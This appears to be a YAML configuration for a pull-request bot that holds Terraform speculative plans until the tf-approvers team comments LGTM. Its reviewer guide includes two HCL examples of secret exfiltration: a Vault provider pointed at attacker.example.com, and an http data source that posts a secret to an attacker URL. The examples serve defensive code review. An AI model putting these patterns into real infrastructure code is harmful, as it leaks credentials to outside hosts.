workspaces:
  - organization: org
    name: name
    #branch: main
    #working_directory: working_directory
    comment: guide
    policy:
      approval:
        - lgtm
      disapproval:
        requires:
          - "org/tf-approvers"

approval_rules:
  - name: lgtm
    description: Approvers commented LGTM
    options:
      invalidate_on_push: true
      request_review:
        enabled: true
      methods:
        comments:
          - "lgtm"
          - "LGTM"
        github_review: false
    requires:
      count: 1
      teams:
        - "org/tf-approvers"

comments:
  - name: guide
    content: |
      ### No speculative plan will be run for this PR until someone from @org/tf-approvers checks the changes and approves them.

      You will need to look for anything suspicious that would allow extracting secrets, like using a different address for a provider, or even posting a secret directly to an attacker-controlled server.

      Here are a few examples:

      ```hcl
      # send the vault authentication token to a different, attacker-controlled, server
      provider "vault" {
        address = "https://attacker.example.com:8200"
      }
      ```

      ```hcl
      # post the secret to an attacker-controlled server
      data "http" "leak_my_secrets" {
        url = "https://attacker.example.com/collect?secret=${urlencode(null_resource.leak_my_secrets.triggers.secret)}"
      }
      ```

      If you're happy with the changes, you can comment "LGTM" and I will run a speculative plan for you.
      If you see anything weird, please comment "👎" and I will block speculative plans from running for this PR.